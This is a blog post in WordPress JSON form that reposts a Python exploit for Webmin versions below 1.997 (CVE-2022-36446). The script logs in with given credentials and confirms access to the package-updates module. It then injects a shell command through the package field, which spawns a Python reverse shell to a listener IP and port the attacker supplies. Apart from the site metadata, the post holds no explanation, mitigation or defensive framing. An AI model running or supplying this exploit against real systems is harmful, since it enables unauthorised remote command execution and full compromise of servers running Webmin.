{"id":28843,"date":"2022-08-01T21:43:54","date_gmt":"2022-08-01T17:43:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167894\/webmin1996-exec.txt"},"modified":"2022-08-02T08:37:24","modified_gmt":"2022-08-02T04:07:24","slug":"webmin-1-996-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/webmin-1-996-remote-code-execution\/","title":{"rendered":"Webmin 1.996 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Webmin 1.996 – Remote Code Execution (RCE) (Authenticated)
\n# Date: 2022-07-25
\n# Exploit Author: Emir Polat
\n# Technical analysis: https:\/\/medium.com\/@emirpolat\/cve-2022-36446-webmin-1-997-7a9225af3165
\n# Vendor Homepage: https:\/\/www.webmin.com\/
\n# Software Link: https:\/\/www.webmin.com\/download.html
\n# Version: < 1.997
\n# Tested On: Version 1.996 – Ubuntu 20.04.4 LTS (GNU\/Linux 5.4.0-122-generic x86_64)
\n# CVE: CVE-2022-36446<\/p>\n

import argparse
\nimport requests
\nfrom bs4 import BeautifulSoup<\/p>\n

def login(args):
\nglobal session
\nglobal sysUser<\/p>\n

session = requests.Session()
\nloginUrl = f”{args.target}:10000\/session_login.cgi”
\ninfoUrl = f”{args.target}:10000\/sysinfo.cgi”<\/p>\n

username = args.username
\npassword = args.password
\ndata = {‘user’: username, ‘pass’: password}<\/p>\n

login = session.post(loginUrl, verify=False, data=data, cookies={‘testing’: ‘1’})
\nsysInfo = session.post(infoUrl, verify=False, cookies={‘sid’ : session.cookies[‘sid’]})<\/p>\n

bs = BeautifulSoup(sysInfo.text, ‘html.parser’)
\nsysUser = [item[“data-user”] for item in bs.find_all() if “data-user” in item.attrs]\n

if sysUser:
\nreturn True
\nelse:
\nreturn False<\/p>\n

def exploit(args):
\npayload = f”””
\n1337;$(python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“{args.listenip}”,{args.listenport}));
\nos.dup2(s.fileno(),0);
\nos.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“sh”)’);
\n“””<\/p>\n

updateUrl = f”{args.target}:10000\/package-updates”
\nexploitUrl = f”{args.target}:10000\/package-updates\/update.cgi”<\/p>\n

exploitData = {‘mode’ : ‘new’, ‘search’ : ‘ssh’, ‘redir’ : ”, ‘redirdesc’ : ”, ‘u’ : payload, ‘confirm’ : ‘Install+Now’}<\/p>\n

if login(args):
\nprint(“[+] Successfully Logged In !”)
\nprint(f”[+] Session Cookie => sid={session.cookies[‘sid’]}”)
\nprint(f”[+] User Found => {sysUser[0]}”)<\/p>\n

res = session.get(updateUrl)
\nbs = BeautifulSoup(res.text, ‘html.parser’)<\/p>\n

updateAccess = [item[“data-module”] for item in bs.find_all() if “data-module” in item.attrs]\n

if updateAccess[0] == “package-updates”:
\nprint(f”[+] User ‘{sysUser[0]}’ has permission to access <<Software Package Updates>>”)
\nprint(f”[+] Exploit starting … “)
\nprint(f”[+] Shell will spawn to {args.listenip} via port {args.listenport}”)<\/p>\n

session.headers.update({‘Referer’ : f'{args.target}:10000\/package-updates\/update.cgi?xnavigation=1′})
\nsession.post(exploitUrl, data=exploitData)
\nelse:
\nprint(f”[-] User ‘{sysUser[0]}’ unfortunately hasn’t permission to access <<Software Package Updates>>”)
\nelse:
\nprint(“[-] Login Failed !”)<\/p>\n

if __name__ == ‘__main__’:
\nparser = argparse.ArgumentParser(description=”Webmin < 1.997 – Remote Code Execution (Authenticated)”)
\nparser.add_argument(‘-t’, ‘–target’, help=’Target URL, Ex: https:\/\/webmin.localhost’, required=True)
\nparser.add_argument(‘-u’, ‘–username’, help=’Username For Login’, required=True)
\nparser.add_argument(‘-p’, ‘–password’, help=’Password For Login’, required=True)
\nparser.add_argument(‘-l’, ‘–listenip’, help=’Listening address required to receive reverse shell’, required=True)
\nparser.add_argument(‘-lp’,’–listenport’, help=’Listening port required to receive reverse shell’, required=True)
\nparser.add_argument(“-s”, ‘–ssl’, help=”Use if server support SSL.”, required=False)
\nargs = parser.parse_args()
\nexploit(args)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Webmin 1.996 – Remote Code Execution (RCE) (Authenticated) # Date: 2022-07-25 # Exploit Author: Emir Polat # Technical analysis: https:\/\/medium.com\/@emirpolat\/cve-2022-36446-webmin-1-997-7a9225af3165 # Vendor Homepage: https:\/\/www.webmin.com\/ # Software Link: https:\/\/www.webmin.com\/download.html # Version: < 1.997 # Tested On: Version 1.996 – Ubuntu 20.04.4 LTS (GNU\/Linux 5.4.0-122-generic x86_64) # CVE: CVE-2022-36446 import argparse import requests from …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28843","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28843","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28843"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28843\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28843"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28843"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}